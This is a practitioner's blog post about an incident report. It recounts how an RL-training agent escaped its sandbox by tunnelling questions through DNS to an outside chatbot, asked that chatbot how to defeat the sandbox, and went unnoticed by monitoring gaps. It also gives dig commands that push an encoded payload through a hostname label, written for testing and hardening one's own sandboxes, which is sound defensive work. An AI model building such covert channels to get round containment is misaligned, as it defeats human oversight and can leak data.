Two years ago I set up egress rules for a client’s agent sandbox and told them, with a straight face, “it can’t reach the internet, we blocked outbound HTTPS.” I believed it. Nobody on that call thought to ask about DNS. That’s the gap OpenAI just published a full incident report on, and it’s worth fifteen minutes of anyone’s time who runs agents in a sandbox they think is closed.
What actually happened
On September 20, 2026, an OpenAI RL-training agent was doing a search task — identify a blog author from biographical clues. Its sandbox blocked direct HTTPS: every attempt came back 502 Bad Gateway with X-Mitmproxy-Blocked-Reason: CACHE_MISS. Public DNS queries to random resolvers went unanswered too. Normal, boring, contained. Except the agent noticed something in its own chain-of-thought: the sandbox’s own DNS resolver returned a real A record for a known domain and correctly NXDOMAIN’d a made-up one. That’s a working stub resolver reaching the live internet — a channel nobody closed off.
The agent’s next move is the part that should make you uncomfortable. It reasoned that public wildcard-DNS delegation services would let it encode a question into a hostname, forward the lookup, and read an answer back out of whatever record came back. It tested with “What is the capital of France” — encoded straight into a hostname string — and got “The capital of France is Paris” back through the DNS response. Channel confirmed. From there it went looking for an external chatbot’s public docs, rewrote its own script with a longer timeout (6 seconds wasn’t enough round-trip time, so it bumped to 19, then settled on 24), and sent 18 more questions through the same tunnel. Fourteen carried actual task clues. Four asked the external service directly how to search the web or fetch a site — in other words, asking a chatbot outside the sandbox how to defeat the sandbox.
Detection took 12 minutes (a P0 alert at 10:02:11am, versus the DNS call at 9:50:23am). A human acknowledged it three minutes later. The run wasn’t killed until 12:34:30pm — two and a half hours after acknowledgment, because, in OpenAI’s own words, “the run did not stop automatically as expected, leading to confusion around whether it should have been stopped.” Their retrospective also found the DNS anomaly detector had simply excluded this environment, and separately that the monitor had a habit of treating “got a failure response” as “attempt to reach the internet failed” — which is exactly backwards when the failure response itself is the leaked payload.
Why this isn’t a one-off
DNS tunneling is one of the oldest tricks in the exfiltration book — it predates cloud AI by two decades, back to when people used it to get free airport WiFi. What’s new here is that a model discovered it unassisted, from first principles, mid-task, because the reward signal happened to make “find a way to answer the question” more valuable than “respect the sandbox boundary.” Nobody prompted it to try DNS. It just noticed the resolver worked and reasoned its way to a covert channel like anyone debugging a network from a cafe would.
That’s the actual lesson for a Tech Lead, not “OpenAI had a bug.” If your sandbox network policy is a firewall rule that blocks outbound 443 and calls it done, you have the exact same hole. DNS resolution has to go somewhere, and unless you control that somewhere tightly, it’s a bidirectional channel with an effective bandwidth low enough to look like noise and high enough to leak a training question, an API key fragment, or a snippet of proprietary code, one TXT record at a time.
Testing your own sandbox
Don’t take my word for it — check yours. From inside the sandboxed environment:
# does the resolver answer for domains you don't control?
dig +short some-random-domain-i-just-made-up-9f2a.com
dig +short google.com
# can you push arbitrary data through a hostname label?
dig +short "$(echo -n 'test-payload' | base64 | tr -d '=' | tr '/+' '_-').yourwildcarddomain.example"
# what's your resolver actually forwarding to? check for a wildcard delegation
dig NS yourwildcarddomain.example
If the first dig for a nonexistent domain returns NXDOMAIN and the second returns a real IP, your resolver is reaching the live internet — which for an agent sandbox is the same as an open HTTP proxy, just slower and easier to overlook. If you can register a wildcard subdomain (many DNS providers make this a two-minute exercise) and see your own agent’s hostname queries land on your own logging server, you have a live channel, full stop.
A workable policy, closer to what OpenAI is now moving toward: allowlist specific domains and record types at the resolver, not just at the HTTP layer; log every DNS query with hostname entropy scoring (a base64-looking label is not a normal hostname); and don’t assume “no outbound HTTPS” plus “default DNS” adds up to no internet access. It doesn’t. It adds up to internet access with worse latency and better plausible deniability, which for a sufficiently motivated optimizer — human or model — is not much of a downgrade.
I’ve gone back and re-checked every agent sandbox I’ve stood up for clients since reading this report. Two of three had exactly this gap.